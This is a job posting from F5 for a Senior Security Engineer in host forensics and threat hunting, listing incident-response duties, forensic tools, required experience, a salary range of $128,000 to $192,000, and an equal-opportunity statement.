• Job Description

  Req#: RP1036126

  At F5, we strive to bring a better digital world to life. Our teams empower organizations across the globe to create, secure, and run applications that enhance how we experience our evolving digital world. We are passionate about cybersecurity, from protecting consumers from fraud to enabling companies to focus on innovation.
  

  Everything we do centers around people. That means we obsess over how to make the lives of our customers, and their customers, better. And it means we prioritize a diverse F5 community where each individual can thrive.

  About the Role

  Join a high ‑ impact team using cutting ‑ edge security technologies and practices to protect F5 ’ s enterprise and product environments. As a Senior Security Engineer focused on host forensics and threat hunting, you will lead strategic DFIR initiatives, develop technical solutions, and drive continuous improvements in our cyber defense capabilities. You ’ ll be a key player in host and cloud forensics, incident response, and advanced threat hunting across cloud and on ‑ prem environments, leveraging industry ‑ leading SANS DFIR and threat hunting training.

  Key Responsibilities

  • Lead and guide team members in RCA host forensics and digital investigations, including mentoring and upskilling efforts aligned to SANS DFIR best practices and certifications.

  • Digital Forensics and Incident Response

  • Preparation: Building plans, playbooks, logging, tools, and training so you are ready before an incident happens.

  • Identification: Detecting and confirming that an incident has occurred and scoping which systems, accounts, and data are affected.

  • Preservation and collection: Capturing volatile data, imaging disks, and collecting logs and artifacts in a forensically sound way (chain of custody, no contamination).

  • Examination and analysis: Parsing and correlating evidence (files, memory, registry, logs, network data) to reconstruct the attacker’s actions and timeline.

  • Containment: Isolating affected systems or accounts to stop the attacker from moving further or causing more damage.

  • Eradication: Removing malware, closing vulnerabilities, killing persistence mechanisms, and ensuring the threat is fully removed.

  • Recovery: Safely restoring systems and services to normal operation and monitoring closely for any signs of re compromise .

  • Lessons learned/reporting: Documenting what happened, producing a clear report, updating detections/playbooks, and improving controls so the same incident is less likely or less damaging next time.

  • Automate manual DFIR processes to reduce operational toil and improve response times, including automation of common host forensics, evidence collection, and hunting workflows.

  • Perform proactive host ‑ centric threat hunting and forensics (AWS, Azure, GCP, Linux, Windows, macOS), including disk and memory acquisition, log and artifact analysis, and timeline reconstruction.

  • Conduct technical security assessments, including static/dynamic analysis, threat modeling, and forensic reconstruction of attack chains and dwell time across endpoints and workloads.

  • Collaborate with SRE, Architecture, and Operations teams to implement security standards and controls informed by forensic and hunting findings.

  • Utilize security tooling ( i.e., FTK, Cyber Triage, Magnet AXIOM , EDR, CrowdStrike , SOAR, DLP, vulnerability scanners, posture management , and memory forensics tools ) as primary data sources for host forensics and threat hunting to detect, investigate, and contain threats.

  • Advise stakeholders on secure design principles and security best practices based on observed attacker behaviors and forensic learnings.

  • Maintain and improve security runbooks and documentation, including endpoint and cloud forensics procedures, incident response guides, and threat hunting playbooks.

  • Stay current on emerging threats, CVEs, attacker TTPs, and DFIR industry trends and apply them to host forensics and threat hunting practices.

  • Follow F5 information security policies and protect information assets from unauthorized access, disclosure, modification, destruction, or interference.

  • Perform other related duties as assigned.

  • Follow the F5 behaviors.

  Required Skills & Experience

  • 8+ years in cybersecurity, including hands ‑ on host/endpoint forensics, cloud forensics, digital forensics and incident response (DFIR), and threat hunting.

  • Demonstrated use of DFIR tools such as FTK, Cyber Triage , Magnet AXIOM .

  • Proven ability to design and execute host ‑ focused and hybrid threat hunts (hypothesis ‑ driven and analytics ‑ driven) across endpoints, networks, and cloud environments, and to turn results into new detections or control improvements.

  • Experience with SIEM and NG ‑ SIEM platforms (e.g., CrowdStrike Falcon, Splunk, Microsoft Sentinel), SOAR, and EDR/XDR tools used as primary sources for forensic evidence and hunting data.

  • Deep understanding of MITRE ATT&CK and threat actor TTPs, and ability to translate them into host ‑ centric hunt hypotheses, forensic pivot points, queries, and playbooks.

  • Demonstrated hands ‑ on experience performing endpoint and cloud forensics (for example, disk and memory acquisition, registry and file system analysis, log and artifact analysis, and detailed timeline reconstruction) during investigations.

  • Proficiency in scripting or utilizing automation tools (Python, PowerApps, Power Automate, or similar) to automate forensic evidence collection, enrichment, and hunting/reporting workflows.

  • Hands ‑ on experience with cloud security (AWS, Azure, GCP) and infrastructure as code (Terraform, Ansible).

  • Solid grasp of UNIX/Linux systems, networking protocols, and firewall architecture.

  • Experience with vulnerability management, penetration testing, and secure architecture design.

  • Excellent communication skills with ability to interface across technical and non ‑ technical stakeholders and clearly convey forensic findings, hunt outcomes, and recommendations.

  Preferred Qualifications

  • Certifications: SANS DFIR and threat hunting certifications such as GCFA, GCFR, GCIH, or equivalent advanced host forensics and hunting training.

  • Experience with ServiceNow, ADO, or similar ticketing/case management systems to manage DFIR and hunting workflows.

  • Familiarity with container orchestration (Kubernetes, Docker) and CI/CD pipelines.

  • Exposure to FedRAMP, eDiscovery, and DLP casework.

  • Strong interpersonal skills and a collaborative mindset.

  • Ability to lead and mentor junior engineers and analysts in host forensics and threat hunting methodologies.

  • Ability to drive strategic long ‑ term DFIR and hunting initiatives with cross ‑ org leaders.

  • Ability to effectively present technical investigations, forensic narratives, and hunt outcomes to executive leadership.

  Work Environment

  • Full-time position with potential for shift flexibility.

  • Requires scheduled on call work outside core business hours (early mornings, evenings, weekends, holidays) shared with the larger team.

  • Duties performed at a desk or computer station; remote collaboration across time zones.

  The Job Description is intended to be a general representation of the responsibilities and requirements of the job. However, the description may not be all-inclusive, and responsibilities and requirements are subject to change.

  The annual base pay for this position is: $128,000.00 - $192,000.00

  F5 maintains broad salary ranges for its roles in order to account for variations in knowledge, skills, experience, geographic locations, and market conditions, as well as to reflect F5’s differing products, industries, and lines of business. The pay range referenced is as of the time of the job posting and is subject to change.

  You may also be offered incentive compensation, bonus, restricted stock units, and benefits. More details about F5’s benefits can be found at the following link: https://www.f5.com/company/careers/benefits . F5 reserves the right to change or terminate any benefit plan without notice.

  Please note that F5 only contacts candidates through F5 email address (ending with @f5.com) or auto email notification from Workday (ending with f5.com or @myworkday.com) .

  Equal Employment Opportunity

  It is the policy of F5 to provide equal employment opportunities to all employees and employment applicants without regard to unlawful considerations of race, religion, color, national origin, sex, sexual orientation, gender identity or expression, age, sensory, physical, or mental disability, marital status, veteran or military status, genetic information, or any other classification protected by applicable local, state, or federal laws. This policy applies to all aspects of employment, including, but not limited to, hiring, job assignment, compensation, promotion, benefits, training, discipline, and termination. F5 offers a variety of reasonable accommodations for candidates. Requesting an accommodation is completely voluntary. F5 will assess the need for accommodations in the application process separately from those that may be needed to perform the job. Request by contacting accommodations@f5.com .

• About the company

  F5, Inc. F5 is headquartered in Seattle, Washington in F5 Tower, with an additional 75 offices in 43 countries focusing on account management, global services support, product development, manufacturing, software engineering, and administrative jobs.

Notice